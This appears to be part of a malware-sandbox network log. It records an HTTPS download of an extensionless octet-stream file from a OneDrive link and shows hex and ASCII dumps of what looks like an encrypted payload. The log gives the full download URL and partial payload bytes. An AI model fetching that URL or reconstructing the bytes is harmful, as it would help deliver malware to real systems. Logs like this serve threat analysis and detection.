2022-11-29 09:41:52 UTC	1	IN	HTTP/1.1 200 OK Cache-Control: public Content-Length: 189869 Content-Type: application/octet-stream Content-Location: https://oyuurg.ph.files.1drv.com/y4mSGho-CS9ha43OZEW82lO2dziQ_J4PjiC6NXSA8W0ZRWTJ3DX_OEN94Gun3Bh_qeHMqeFO8NaxvtzqyAuSJUmQ1yXBgLgfSLKBS80KFCv7mt-jDoI1mFy9AG79miBaq9i2A0fMNIE0LaGBZaVQPLbAzh0UOAS9F9MqeKsGHvHJFuVD_LfVTL8IYpVBSNgEomu Expires: Mon, 27 Feb 2023 09:41:52 GMT Last-Modified: Tue, 29 Nov 2022 05:38:54 GMT Accept-Ranges: bytes ETag: E0CF7F9E6AAF27EF!850.2 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-MSNSERVER: PH2PPF279B671EB Strict-Transport-Security: max-age=31536000; includeSubDomains MS-CV: o3By+9xgXUySBO3222qlWw.0 X-SqlDataOrigin: S CTag: aYzpFMENGN0Y5RTZBQUYyN0VGITg1MC4yNTc X-PreAuthInfo: rv;poba; Content-Disposition: attachment; filename="Iuigzwjduoa" X-Content-Type-Options: nosniff X-StreamOrigin: X X-AsmVersion: UNKNOWN; 19.1047.1109.2003 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 5E9FC5C05B0147F29A76ED584E51C6B0 Ref B: VIEEDGE2113 Ref C: 2022-11-29T09:41:52Z Date: Tue, 29 Nov 2022 09:41:52 GMT Connection: close
2022-11-29 09:41:52 UTC	2	IN	Data Raw: 1e 1c 93 8f 34 9f 65 ea 8b 34 8d b1 6b 6b ea 34 8d 18 8f f4 1a 1e 1c 93 6b 6b 8d 34 18 8d 9f a1 18 8d 8b 34 10 fe 6f 85 0e 7d 7f fc 7d 83 02 79 71 fc 10 75 6f 81 0e 6f 00 81 6f 83 73 77 6f 73 f8 0a 81 6d 10 71 0e fa 75 73 10 10 00 71 85 73 7f 00 f8 fe 06 77 08 81 0e 1e 1c 93 8f 34 9f 65 ea 8b 34 8d b1 6b 6b ea 34 8d 18 8f f4 1a 1e 1c 93 6b 6b 8d 34 18 8d 9f a1 18 8d 8b 34 b3 81 75 73 10 83 00 fa 81 7b 6d 1e 1c 93 8f 34 9f 65 ea 8b 34 8d b1 6b 6b ea 34 8d 18 8f f4 1a 1e 1c 93 6b 6b 8d 34 18 8d 9f a1 18 8d 8b 34 37 29 aa c4 39 bc ba 1b bc b6 25 b0 a8 1b 37 b4 aa b8 39 aa 27 b8 aa b6 a6 b2 aa a6 1f 2d b8 ac 37 a8 39 1d b4 a6 37 37 27 a8 c4 a6 ba 27 1f 29 31 b2 2f b8 39 37 29 aa c4 39 bc ba 1b bc b6 25 b0 a8 1b 37 b4 aa b8 39 aa 27 b8 aa b6 a6 b2 aa a6 1f 2d Data Ascii: 4e4kk4kk44o}}yquoooswosmqusqsw4e4kk4kk44us{m4e4kk4kk447)9%79'-7977'')1/97)9%79'-
2022-11-29 09:41:52 UTC	4	IN	Data Raw: 33 13 8f f9 6b b4 eb 8f f6 99 15 32 7b 87 1e 28 d2 8a 92 87 0d 2d ee 54 51 30 3e 96 1b 31 92 ca 1e 0c e5 c1 57 d0 db 2a 0d 4a b0 5f fd a6 f4 1e 5b 53 7f f9 b6 67 ac be c1 79 75 de c7 7e 4e fc aa 38 b1 ea d2 04 94 58 03 8f 78 9e a3 08 e6 31 13 dc 5b e1 da 03 04 48 28 4a c4 40 be 31 3f b9 6d d9 11 08 32 48 8f 21 16 34 11 80 a6 14 98 7a 26 55 fd 23 ee 2f 78 f4 ee 16 7a e8 6e 0b c4 91 35 e7 42 d3 b5 a4 75 de cb ff e4 a2 bb f9 29 a8 b0 52 88 94 14 38 06 c2 9f bf c2 83 17 9a eb f0 92 37 a5 9a 06 ec 1b e2 d6 ff 72 2c e2 fd 02 c6 e6 a7 aa c3 3b c1 10 fc 48 f2 1a 7f 99 0d 78 7c bc 4d 39 b1 fc 3d c5 9a 04 5f a0 da c8 11 a6 58 d0 c3 e3 ec 3a e0 6d 0b f7 a5 11 34 5e d7 5d d6 00 91 6d a1 bc ba eb 5b 1c 4b 75 38 be 69 74 4e 05 db e1 24 5d 55 25 e3 7b e9 20 20 ba 2e 05 Data Ascii: 3k2{(-TQ0>1W*J_[Sgyu~N8Xx1[H(J@1?m2H!4z&U#/xzn5Bu)R87r,;Hx\|M9=_X:m4^]m[Ku8itN$]U%{ .
2022-11-29 09:41:52 UTC	12	IN	Data Raw: ef fa ef 69 8f 71 51 5a 40 ad 3a 0c 17 77 87 61 00 2f 19 b0 6d 48 1f f2 00 ef ad e8 31 ba 9f 96 36 04 5f ee 5a 45 46 79 6a ca e6 94 19 6e 54 fa 1d f1 0f 0d 05 f9 c7 45 2e 64 90 b2 0c a9 76 da 64 85 bd be 78 15 c4 08 86 0e d9 e5 70 ce a8 d3 da 11 53 1c 06 03 7a 24 85 96 3e ab ed f0 38 c6 1c 87 46 f3 6e 15 de d5 a4 b8 b4 60 0c 3a 8c 1d ef 37 ff 84 0c c2 8d 18 35 71 9d 44 39 95 0d a2 af dd c7 63 ac af 9a 1a 7f af 0f e0 e0 1b 8b aa eb 65 ce 75 58 ac 74 0f 96 68 0f 89 c0 4e 25 b4 d8 53 99 15 83 94 81 af 7f 6e 9d e1 6f ea 70 a2 72 b9 4f 40 29 8f 87 c4 1b f4 9e 24 6c 15 a5 d9 9f ea 45 75 9b c4 10 7b 38 44 91 65 8d 84 c0 fc fd 45 54 af 25 25 f8 5d d8 29 0c c1 0e 06 f0 4b 0f 4a b2 c2 9e 69 47 56 85 a3 f2 2d 5f 7c 1d e0 3a a2 99 6b 0b 46 41 20 3a 01 5b e8 96 67 d0 Data Ascii: iqQZ@:wa/mH16_ZEFyjnTE.dvdxpSz$>8Fn`:75qD9ceuXthN%SnoprO@)$lEu{8DeET%%])KJiGV-_\|:kFA :[g
2022-11-29 09:41:52 UTC	20	IN	Data Raw: 34 34 3d 6e f7 f0 47 6b fb a9 50 c5 d1 22 7d 59 e0 96 a8 7a f9 b5 e3 d6 63 67 e4 5e 8d c8 79 32 c9 3e b4 d4 98 bd 1f 94 b1 92 30 34 ca 9e 8f ea cd a9 1b dc 63 17 7e 68 aa 3d ab fb 18 34 61 cc eb b2 a5 61 ef d9 02 4f c2 1c ab 97 8f c9 96 bc 38 17 c1 27 d3 de 0d d5 6d 97 b2 65 8a 15 b9 5a 24 85 54 1f 6a 41 53 e9 04 7a de 9e 61 12 82 00 50 22 c6 d0 ce 93 11 c5 23 0e 51 1c 9b 14 9b 56 c7 77 32 16 31 4d ec 53 ec a2 f4 76 64 6b 63 f9 35 a2 7a 41 0a 4b 23 05 3f 08 78 80 b6 f3 d9 41 02 5b 04 86 8b 27 a4 41 25 2a 0b 53 7b 6b f1 e2 95 82 d5 9c 62 0a 9a b8 ad 67 b2 b3 7e 6c 5e ab 86 b6 79 d6 c1 1b f6 3c 2e 9c 26 be 2d d4 fd 9c fe 86 8e 78 25 36 ca ea c8 01 b6 c7 b2 32 e4 34 3e 10 c2 42 91 e6 61 05 70 0c 3e 96 fa dc df 49 c3 6c ea 21 52 d6 0f 78 f4 2b 90 e6 ea f6 8c Data Ascii: 44=nGkP"}Yzcg^y2>04c~h=4aaO8'meZ$TjASzaP"#QVw21MSvdkc5zAK#?xA['A%*S{kbg~l^y<.&-x%624>Bap>Il!Rx+
2022-11-29 09:41:52 UTC	28	IN	Data Raw: 65 36 4e c7 43 30 7e 9b 4d ad 89 21 60 77 35 67 ce 28 ee 06 09 b8 c8 7c da df 6b cb c3 eb 50 43 7c 5b 1f eb 6b 97 2b 8f 87 98 a2 a7 c5 7b af 4c 62 ee ac 2e 88 8a ef 61 17 45 c3 7d 71 b4 f3 de 1f c3 8c eb bc 74 fc f2 c1 59 f9 f9 2d 7d 02 2b 31 26 9c 5d f1 bd b1 18 48 ae 05 b8 cd ec 33 8c 4c 96 12 1d a0 aa 34 06 f5 ea b4 8b 35 5a f1 2b 02 45 e6 70 b9 c0 2a f9 67 fc b5 36 53 0b 2e 91 8e 2b c9 7c 39 f4 a3 c4 ac 73 d3 fd c4 4d 23 77 5d 57 d3 a9 be 1d 0b ad 95 7d d5 c1 6d cb ff bc f0 65 02 ad 84 75 b5 65 26 15 32 92 0c 70 8c 53 16 3a e7 67 76 2e 03 72 4e 49 e2 14 f4 fd 85 71 a0 4e 2c f9 de 2f ee 17 d3 1c 83 1b 07 04 2e 32 db 23 2a c4 7d e2 13 3b 4a 11 95 67 64 1d 53 69 89 ec 7e a5 bc 41 6a 63 68 92 3f 20 3c d2 76 43 1f 4a 0b 9f 8d f0 23 70 b0 76 86 de ba a8 cf Data Ascii: e6NC0~M!`w5g(\|kPC\|[k+{Lb.aE}qtY-}+1&]H3L45Z+Epg6S.+\|9sM#w]W}meue&2pS:gv.rNIqN,/.2#};JgdSi~Ajch? <vCJ#pv
2022-11-29 09:41:52 UTC	36	IN	Data Raw: c8 89 2a 84 4b dd f2 97 09 a0 e5 22 0d 8f ce 42 eb 76 53 0c f1 35 03 22 5d 11 cf 83 69 87 ec 82 57 ed 5f ed 11 fc 5a 1f 18 66 05 94 c6 ae c2 33 f5 55 d6 8e 05 1e 41 24 e4 a9 dd 88 6a 7d 44 83 c4 c3 fc e5 83 22 e8 61 35 3f 56 23 7c e1 95 ee b0 c2 53 86 f8 b6 f6 93 63 3b 27 03 17 dc 67 49 84 37 17 29 a7 4d ca bd c3 80 66 eb 0d b2 43 34 c3 4d e7 6a ce 13 6b 79 b0 d8 7a 41 bd 0a 72 a4 2e 24 ea 22 57 db bd d7 8a 3b 4e 1c ca fb 7c f7 b2 07 c6 26 5b 5c c9 a8 f9 86 f7 51 80 61 29 31 a1 c0 08 da 93 97 f3 f8 16 e6 f9 41 06 5e 81 10 e9 61 a4 23 78 59 67 03 72 7b 7b d2 1a 5c 89 1f e5 a1 9c e2 9c 4c 3a 55 ef 3c ab 5a e0 31 e6 ee 18 44 61 2f d9 a2 a1 b4 6c 8c f7 70 4e 83 62 76 d5 a4 a2 99 19 68 7a 05 b9 de a9 9e 3a ee 35 8f b7 c2 2d 46 c7 fc ef 03 2b fb e0 91 29 ac f8 Data Ascii: *K"BvS5"]iW_Zf3UA$j}D"a5?V#\|Sc;'gI7)MfC4MjkyzAr.$"W;N\|&[\Qa)1A^a#xYgr{{\L:U<Z1Da/lpNbvhz:5-F+)
2022-11-29 09:41:52 UTC	44	IN	Data Raw: eb 39 db f8 2c 2a b0 c9 84 e6 ef 7d bb fc 85 68 ae 9b 88 56 46 fd eb 19 13 75 a8 8e 45 e0 f9 c2 df 5f b5 a1 cd 12 16 e4 43 d3 96 7c 7b 0d 28 d6 0a ad 2b 9c 91 39 f6 6d 05 5b ce 62 e7 95 4a d6 57 11 05 ae 79 d6 0d 71 28 9d 67 36 99 80 9c b5 cb 2f 9e ad 02 68 a9 4e f3 f7 0e 81 b3 75 96 9f 39 d9 70 6b 1e a8 43 8c ea 81 a0 6b 6f 8d 8e ba ee 09 44 8e f9 2a 3e 71 87 fd db 0f 47 ac 0e c5 14 13 c9 6e 0a 7d b5 7f 7c cd 7b 25 49 2b 07 75 be 47 61 58 03 bb 49 27 6c 24 04 73 f8 4a f0 fd e9 6d a2 9d bc 50 52 37 9b 94 3c ea 71 a7 3b 50 b4 73 cd 16 15 30 72 f3 2a b6 35 5b 5d a8 51 b5 7d bc 33 fe 00 f7 c3 5b c1 c7 a3 5d b6 43 85 11 8c b7 1a fe f1 b2 68 00 f0 44 63 72 e8 ba e9 7d 23 74 70 8c 92 9b f3 06 fd 41 7a df 1a 8a 85 98 26 b2 fd 8e ea 2a 34 ee 28 56 0c 13 07 78 38 Data Ascii: 9,}hVFuE_C\|{(+9m[bJWyq(g6/hNu9pkCkoD>qGn}\|{%I+uGaXI'l$sJmPR7<q;Ps0r5[]Q}3[]ChDcr}#tpAz&4(Vx8
2022-11-29 09:41:52 UTC	52	IN	Data Raw: d3 8d 77 70 01 3f 6a 79 3c b3 9f 72 c1 be 7c b0 42 13 4e 3b e1 84 fc ff 3f de 26 1d 90 e5 64 96 8e b0 aa 6d 3d 23 51 da f4 50 c3 55 02 25 23 1e b5 1c 2f 18 ac f5 66 53 8a 0a e5 6b b3 25 2d f5 c7 fb 2d b1 89 c8 d6 10 d1 f3 53 85 ea ce 70 43 d5 72 5a c0 ed 1d e8 f7 a0 c3 84 9f ff d9 89 03 3b ed df dd f6 00 13 a0 6e 7d ff 39 9d f5 f7 71 04 85 7d 6c 7e db ff ec 7d cc f3 86 fd dd d9 a6 13 b5 59 bd 3a 69 8c ac 7f 9a 80 80 bc c1 52 da cc a4 94 3d f7 2e 87 87 2f 2a 28 15 5d 0d e9 b0 66 51 03 86 bd e8 32 fe 82 3e a7 43 d7 c7 7f 67 b0 ec 27 ff b7 3e 31 58 af 2f 15 f7 62 ca de 17 8b dc 80 0c e0 ca fa 76 cb 4d a5 2e 7e 12 e2 95 7d 8a 52 c5 02 d8 41 44 6a 9b 18 8f bc 5f e1 21 34 33 a4 e8 58 8f 79 4c 37 72 c5 63 6f 87 a0 f6 69 4e c3 72 7f e9 0d dc 7d 87 7a 9f 90 80 51 Data Ascii: wp?jy<r\|BN;?&dm=#QPU%#/fSk%--SpCrZ;n}9q}l~}Y:iR=./*(]fQ2>Cg'>1X/bvM.~}RADj_!43XyL7rcoiNr}zQ
2022-11-29 09:41:52 UTC	60	IN	Data Raw: 34 0b f5 03 95 ba d8 21 a6 a6 b8 7a 90 bd 8d 69 5b dd 3e 8b f0 df cc de 4c 26 92 6a e5 04 df c2 23 a6 75 00 1c 57 78 ae 2e 59 bb 17 ff 99 19 25 49 a1 cc 4a 5e 52 0e fe fd 29 4d 4b b5 e9 99 79 28 8b c7 a1 33 b4 53 a8 7d bb f1 0a c9 dc ae 67 23 01 ff d6 7b 26 fb 87 f2 1a 1c 06 e0 2a c0 e1 81 ed 72 3b a1 51 48 65 78 29 76 04 e2 78 b7 1d af 7f 90 c8 3b 4b 78 b1 c9 89 b0 b0 e7 c5 75 d1 eb c5 99 a0 c4 45 11 be c5 cb 5b 91 b3 ef 13 d8 00 6f c3 c9 43 2b d6 18 a8 4c 16 ea 34 2e 19 f7 71 99 46 42 f0 c4 5b f5 cc 5d 7a 42 cc 3f 12 db 36 8a ad 47 41 cf a8 20 64 95 8f 02 2e 2b 7a ab bb c4 da 0a 91 3b 06 b3 3e c6 90 e9 51 74 70 81 ba 47 be 0b d7 44 86 9c 84 26 26 be 55 6f d9 fa 30 22 24 f7 f5 fd f7 e6 64 c4 4d a7 8c 69 01 13 23 e6 96 63 d2 7f ac 91 10 1c f8 ac 61 e8 1e Data Ascii: 4!zi[>L&j#uWx.Y%IJ^R)MKy(3S}g#{&*r;QHex)vx;KxuE[oC+L4.qFB[]zB?6GA d.+z;>QtpGD&&Uo0"$dMi#ca
2022-11-29 09:41:52 UTC	68	IN	Data Raw: b4 c2 97 44 47 f5 2e e4 8d 75 ef 81 da e4 47 5c 5a d3 2e 4a 3e 23 68 b2 bd 0e 3f 0b c4 c9 25 12 46 a0 b6 62 35 98 1b 5b b8 dc df b8 ce 06 b9 b1 ae f0 28 60 f4 90 7d b7 a9 37 f5 64 91 49 fe 3e 34 18 21 83 a6 d5 1e 88 12 9b 9f 50 c0 de 20 11 34 f1 f1 59 18 55 15 46 4e 96 b5 fe 03 d5 5b b3 67 97 72 6f 27 e5 eb db 7e 85 20 90 7e 97 92 52 48 9c f8 7b e2 b9 c6 6e fd eb ca bd 86 9d 05 04 9c 55 51 b2 ff fd a7 16 71 cd f4 20 d3 50 28 47 f5 e7 20 15 48 49 68 02 bf 27 75 37 61 71 0d 34 96 fb ae 3f a0 cb b6 dc 93 e5 de 5f fe d5 10 46 e2 a7 3e 44 8b c7 40 68 62 4b e6 b1 eb 36 de e4 1b ff 56 31 97 66 6e c7 a9 f7 9f 7c c3 37 e9 e1 b0 f2 4e 7e aa f2 56 91 49 cb 7a ff 48 f7 78 db ff 3b 9e da cb b7 b6 f4 bc 22 0c 55 26 b9 6f bb 59 0a 11 f4 48 59 6c 53 9f 36 1d 3c ba db ca Data Ascii: DG.uG\Z.J>#h?%Fb5[(`}7dI>4!P 4YUFN[gro'~ ~RH{nUQq P(G HIh'u7aq4?_F>D@hbK6V1fn\|7N~VIzHx;"U&oYHYlS6<
2022-11-29 09:41:52 UTC	76	IN	Data Raw: ca 27 8b e6 c5 8b 2d c8 3b 01 be 70 b6 da 1f 48 56 47 3e ba 5f cb 46 ef bd 1f 61 57 e9 e4 c2 06 52 19 75 65 d6 69 6b b8 5b 3b c5 9a e6 3e bd 2f 20 dd 79 34 18 03 99 2f ab 7b 85 e0 34 97 1a 2b 4e 33 2f 6d b6 d3 67 dd 94 aa cb bb 66 4d d2 48 8c c6 a2 42 d2 e8 12 8e 63 0d aa 26 9a bc 8e e5 e8 5d 33 f0 32 75 fe ef 50 b1 13 f6 5d ec f0 88 1b b4 ec 54 4f 2a 9b fe 33 96 bc 53 28 38 c5 c7 a9 9f d5 53 3d 96 d9 63 ed cf c4 f5 be 99 0f f1 4e b7 ae f3 b3 80 43 8a 38 3e 84 0e b5 27 ca 3a f7 f8 bd 7a e9 50 4b 3e bc af 1b a0 cf 32 a1 48 d0 bf d4 d4 62 49 e9 ed fc 8b 5f 22 05 a1 5d 68 ff 65 67 4e cf 02 ca df 9c 02 d0 b0 4c fb 23 ae f0 2f 88 3a 2a fa 30 40 9e ab 66 86 79 2b 94 69 e1 72 3c cc c0 d8 cd 2f 5d 42 1c 4e 51 ff e8 c6 db 52 46 2f f5 60 1b b8 09 37 6c 9f de be 60 Data Ascii: '-;pHVG>_FaWRueik[;>/ y4/{4+N3/mgfMHBc&]32uP]TO3S(8S=cNC8>':zPK>2HbI_"]hegNL#/:0@fy+ir</]BNQRF/`7l`
2022-11-29 09:41:52 UTC	84	IN	Data Raw: d6 0a 16 b6 c6 1d 85 1e b9 89 6d 8f e6 9f 07 1b c2 20 dc fd c0 ba 55 95 7a db 63 7c cb 17 79 9e b3 6c 6d f6 49 2b 09 e6 0e 6c 64 6e 4d 4d 8b 17 84 d7 57 15 1b 21 ce 27 d7 16 32 95 6e e6 04 1f d2 0e be f1 b4 3c b5 43 1f eb b3 c4 b6 41 e4 bd cf 31 a2 e9 21 8f 9a ea cd dd a0 ef 31 4c be 2f b3 bd e3 fc 1e 14 61 70 ba 05 69 ae 0b 28 d8 f1 86 49 1f b3 4c 0d 34 49 f9 2a 1e 9a 67 18 7f 63 29 04 4a 0b a1 8c 67 96 8f 64 30 5f 48 59 d7 ed 67 2e d9 83 0f a8 84 6f 42 3c fc fc 96 2a 2c ef dd 05 ac f1 b6 a8 7a 94 f7 6e 3a 91 31 a4 ba c7 92 3b e1 b1 a4 07 bc dc 91 87 4e 82 53 e4 72 11 54 eb 55 1d 8f 33 cb e9 ef ac 68 db 88 bf cf 17 ce 06 fb 77 68 42 25 8c d0 64 42 76 ab c1 73 af b5 cf b7 5e 4d b3 88 30 d0 dc ed fe d5 ee 3f 66 36 90 76 c3 24 64 07 74 da c0 37 14 c5 ef 17 Data Ascii: m Uzc\|ylmI+ldnMMW!'2n<CA1!1L/api(IL4Igc)Jgd0_HYg.oB<,zn:1;NSrTU3hwhB%dBvs^M0?f6v$dt7
2022-11-29 09:41:52 UTC	92	IN	Data Raw: 16 cc c2 28 15 77 c6 8c c5 94 1d 0b 26 93 61 0c 89 d4 af 60 92 87 21 38 13 e3 84 1f e9 4b 21 fc ca 93 50 1b bf c3 0f 58 77 a8 b8 42 4b 62 9d 4f 7a e2 b4 b6 5d 4c 79 61 79 f6 bf ba 5f bf ed 6d fb 06 34 ff 4b 3d b2 d7 21 5d 65 d1 75 0e 42 b7 e2 ea 83 f0 5b 05 62 38 f1 bb b0 a3 55 b1 40 48 59 d1 2f a1 aa 12 80 7e 7c f8 d8 3f 3b ff c9 cb f3 0c 7d a8 9f 0d 7e 07 44 97 49 be 23 f8 c9 b0 1b c2 7e 1b b5 46 27 8c c0 79 16 1d 0d e3 07 1c ef 3e 3d ee 0a 8c 0b 3c 23 87 97 4a bb 13 84 6f 35 09 61 16 8a 3a 07 77 bd 63 96 d5 8e 85 02 05 32 f3 17 29 b6 66 51 e2 89 ae c6 cc 94 49 72 18 2f 79 ee 58 03 d6 a4 a3 bb 67 79 d9 48 c0 a6 24 f5 78 63 34 3a 85 ba c2 14 bc ea 9e 37 d0 86 f0 6d a6 66 d9 5f e0 fa 51 b3 31 e3 bf e3 ff 99 bf 64 d9 5e 3c 27 9a df 01 9c 17 d9 e2 5b 2a 77 Data Ascii: (w&a`!8K!PXwBKbOz]Lyay_m4K=!]euB[b8U@HY/~\|?;}~DI#~F'y>=<#Jo5a:wc2)fQIr/yXgyH$xc4:7mf_Q1d^<'[*w
2022-11-29 09:41:52 UTC	100	IN	Data Raw: e5 6c 66 fa da aa 8f 80 af 62 2b ba 2f 12 64 4f f6 b4 9e 05 d7 c1 5b 65 e4 30 f9 c9 50 6f fe 63 64 31 1d ee 97 03 c1 cc 1c fb 94 b1 e7 55 f5 30 58 7b 16 eb 3e 88 22 8e 7f 6d 26 b4 a2 ca 1b f5 bf 06 61 04 6e 48 c1 99 9b 9b 19 8b 59 c0 10 47 dc c8 e9 13 c6 c2 d1 8c 3c a7 f2 df ed 8e e7 89 e9 da b8 e9 d5 51 45 43 f7 f7 13 11 48 14 7a 2e f0 d8 16 88 e4 03 85 21 f4 41 48 75 60 b5 87 dc d1 1d 88 0a be 65 1c 05 61 b2 9a dc 3d 8a 3b fc fa 3a fb 11 c7 12 0e 9c fe 47 0c 76 34 40 7b 2e b0 11 44 d5 55 ef 73 6c 23 03 03 b4 63 8a 58 2f be e7 0b d1 89 99 1f 6a 40 6a aa 94 27 6c 2f e3 6e 71 6f a8 24 26 7b 93 81 03 d3 6d a1 09 25 7a 4e 46 c0 bc 6c e4 a7 dd 08 04 45 3c 53 4d 09 6a ff 2f c3 a9 d5 2c c8 e3 28 b3 0e ef d0 5b 3a 25 98 88 2f 83 28 7e b9 98 0e 20 fb ae de 5d 53 Data Ascii: lfb+/dO[e0Pocd1U0X{>"m&anHYG<QECHz.!AHu`ea=;:Gv4@{.DUsl#cX/j@j'l/nqo$&{m%zNFlE<SMj/,([:%/(~ ]S
2022-11-29 09:41:52 UTC	108	IN	Data Raw: e5 d0 79 9e da 1e 5e 71 be ae 3a 61 a6 45 6b f3 c6 5a e0 a5 96 0c 17 8c 35 0e db 6a 4f b3 c4 d4 d2 42 e2 ea 05 5c bb b0 64 f0 a7 20 9b a5 87 1a 86 66 4b 65 e0 ad 10 1d 5d bb ed 3f ea 14 41 81 04 59 ad 4a 24 03 57 4d 8a 4a b4 fd 49 f2 b0 7a 30 9e 58 dc f6 62 15 4a 68 ef e4 8e 5a cc 3d f6 b3 d6 d6 c9 ad fd 14 52 0f 08 fa 69 50 96 65 88 dc 4a 95 1a 48 2d 3f 80 23 29 42 ab 0f c2 44 bc c9 f5 79 25 a3 fd f2 4a 5c ac 4a ed c1 2e 2a bc 25 1c e9 fc 45 3d 1e 04 8f 23 69 f9 3c 3a 09 ac c8 5c a8 17 da e8 45 50 10 93 74 f5 a8 89 59 f8 69 db 10 4f ba 3a 4a 7a fa 2a ef b8 63 37 b4 a8 5b 24 1b c8 e3 55 bb ad 1b 00 a6 9d 14 19 12 8d 56 5b 5a 96 e9 d4 74 0f c0 05 8a db 15 f9 83 09 e6 b7 91 95 37 87 26 9b 8d 15 4a b3 26 e5 9c ad 79 a7 07 5a 5f aa 0f 34 b0 96 e1 8b a6 88 65 Data Ascii: y^q:aEkZ5jOB\d fKe]?AYJ$WMJIz0XbJhZ=RiPeJH-?#)BDy%J\J.%E=#i<:\EPtYiO:Jzc7[$UV[Zt7&J&yZ_4e
2022-11-29 09:41:52 UTC	116	IN	Data Raw: c8 2f bd 38 fc 7d 37 b0 8c 99 46 b5 aa de ec ea ca 42 b0 3a ee f5 99 6c 7a d4 d6 d1 8f ec 60 37 91 e2 e5 6c 80 04 0e ed 42 93 0d 66 4a 11 59 99 82 f7 8a 14 62 59 91 ad 27 92 f3 94 24 48 ba 9c 60 cb 85 2e b6 9e d1 b8 ee 6e 2d f6 e8 76 07 37 83 17 51 34 d3 8c d6 f2 2b 21 2e a7 10 7e 6f dd 1c ff 50 30 bf 1a 8f fc ac ec 94 d1 d6 8f e4 54 53 5e cf bc e8 1c 4e 89 1a eb 51 4a ec ff a3 ff 2b f8 16 19 9c a8 84 00 6e 2f 52 e7 ee 1c a2 6f 92 0c ef 16 fd 9c 41 4a a2 86 35 6a 55 52 52 34 0b 1c 9a 1d 52 d1 84 f0 65 cd e3 e4 8d eb af e7 bc 57 bb a8 34 10 1c b5 70 17 05 82 bc 5f db de ad 67 fe 35 e5 66 8f 4a e6 45 ec 7f 76 f4 95 44 55 56 a4 4f 61 24 1d c9 8a 4c 0a 4b 4e a3 19 53 42 cf dc f1 f9 88 b5 64 30 8f 34 e7 ba 5c 77 e3 54 23 30 0d 23 c4 ad c9 3a 83 a8 c4 ab e7 ec Data Ascii: /8}7FB:lz`7lBfJYbY'$H`.n-v7Q4+!.~oP0TS^NQJ+n/RoAJ5jURR4ReW4p_g5fJEvDUVOa$LKNSBd04\wT#0#:
2022-11-29 09:41:52 UTC	124	IN	Data Raw: a8 25 f7 61 ba 96 f0 4f 08 3f f5 c1 1e 49 ce 14 19 93 8c 38 21 66 f9 ad 46 1a d1 f8 74 57 dc 87 7b 4a f2 02 3e 9f 5f 4f 2b ca 22 0b 32 74 a4 e0 15 c0 09 63 85 31 2c b0 e8 87 cc f6 03 59 ac d6 42 ad 6a 3f 78 42 9b ba 88 51 34 67 c2 b7 df c6 bb 84 c5 b5 ea 0c c9 0b a6 d9 84 7c 49 0f 60 f2 c2 c6 cc 61 4b 06 1a 92 e9 53 7b ad e2 04 e9 45 77 3a 47 d0 bf 75 4d ab 05 4a 23 a4 74 f0 7c 3a 7c 38 9e c4 f9 5e 12 aa b7 22 01 fc e7 8e df 17 6a b9 26 a1 db ba d6 11 9f ea bc 3e b3 bb 38 cd 2d 80 a4 dd bb ea 48 ca 77 03 2b ab 7b d0 90 d5 3b cc 4f 73 b3 04 97 72 80 5f ff fd e7 28 4e 33 35 69 c0 41 25 ea 45 f2 b4 61 b4 81 ee 08 56 10 cb c2 7c 5d 4b 66 c1 c6 74 6a 10 30 12 11 54 4f b8 70 12 6c 74 58 9e 6c a2 43 cc 0e 3d 08 8e dd bd c1 68 fc cd 9c d5 8f 67 30 ec 81 7a 3b 00 Data Ascii: %aO?I8!fFtW{J>_O+"2tc1,YBj?xBQ4g\|I`aKS{Ew:GuMJ#t\|:\|8^"j&>8-Hw+{;Osr_(N35iA%EaV\|]Kftj0TOpltXlC=hg0z;
2022-11-29 09:41:52 UTC	132	IN	Data Raw: 86 77 20 fb 87 6a 85 31 35 4c 71 03 2e 15 c8 9c 77 92 62 56 66 c1 14 47 41 f6 8e 99 5f 57 d0 01 af 40 e7 8a a3 4c 24 6d 0e 13 00 56 65 31 8a df b1 ad 79 cb 2c 5e 20 7e e2 3d 5d 61 15 ee 1f 7d 70 77 f0 6d fd 98 8f 6f dd 01 90 2b c0 86 b1 12 36 06 d3 15 99 73 46 aa 86 46 b0 ec 17 6f 08 49 a7 47 90 e7 a9 97 df fb 23 09 98 90 67 3f 07 60 ca 08 b3 ed 37 a3 2f f1 d9 42 ee a5 bd 1a 59 f9 8b 60 66 2b 99 dd 4a b7 25 ad 3a 56 ec a1 0b 12 f7 46 f0 cf a9 fc 6e 70 76 f0 5c c0 d1 9c c6 cb c4 5c 50 c3 8b c0 95 dc 77 22 6f 19 89 d9 18 99 ef f7 b4 cc 0e 4b e1 c3 66 00 cc 9c b6 24 b6 68 d3 74 b6 fd 52 c2 ce 1a 8d bb 19 12 19 60 08 65 7e 01 15 9a af 5e fb 59 f1 7e 6a a0 ce 60 aa cc ad d6 98 df 7e 5a 5d 71 01 16 35 20 3f 7b fd fd 50 28 6a 60 d4 45 68 3f 24 fa 16 dd aa d6 7a Data Ascii: w j15Lq.wbVfGA_W@L$mVe1y,^ ~=]a}pwmo+6sFFoIG#g?`7/BY`f+J%:VFnpv\\Pw"oKf$htR`e~^Y~j`~Z]q5 ?{P(j`Eh?$z
2022-11-29 09:41:52 UTC	140	IN	Data Raw: 51 f3 7e ab aa 2a 26 c5 11 57 43 07 bb 99 5f aa a7 14 41 92 27 32 3b d0 df b9 c9 2d a6 e8 97 41 3d 86 e0 02 4d 89 f6 30 af d9 4a ec e0 c5 47 f7 81 27 8e 04 8c a6 8b e1 68 de 78 99 78 47 dc 37 d0 5c 62 2c fb 0f 6e b0 33 96 1f c6 9a ed 27 21 04 11 47 ef df 85 f4 89 79 25 1a 5c 6a 71 b3 a5 e4 b9 80 2b cb fc c6 f2 84 ee 30 1b f9 a3 d4 30 22 4a 49 41 96 90 99 cb 10 44 82 c0 18 ed f8 9c 80 62 ee 7b f9 07 ec 30 4c 4a 32 e2 55 63 4b 23 7c b5 50 72 ea 8f 4b 2f d3 4b b5 34 77 5f 88 82 65 7a 6d ec 2a 1a 37 ec 31 c1 f5 07 d4 78 3f 11 be 2b 92 69 ea f7 16 4d f9 48 62 61 55 9a 83 32 d8 51 64 57 db df d6 5d cc 20 81 a9 8a 12 bb de 22 d2 63 a6 3e 8b 25 32 b9 08 aa 7e 7e 89 d2 cf 12 21 33 a6 bb 0c 90 51 3e c8 65 15 e6 cd a6 5b cd e6 61 e4 63 62 d0 c2 83 08 72 1b 99 0d 5f Data Ascii: 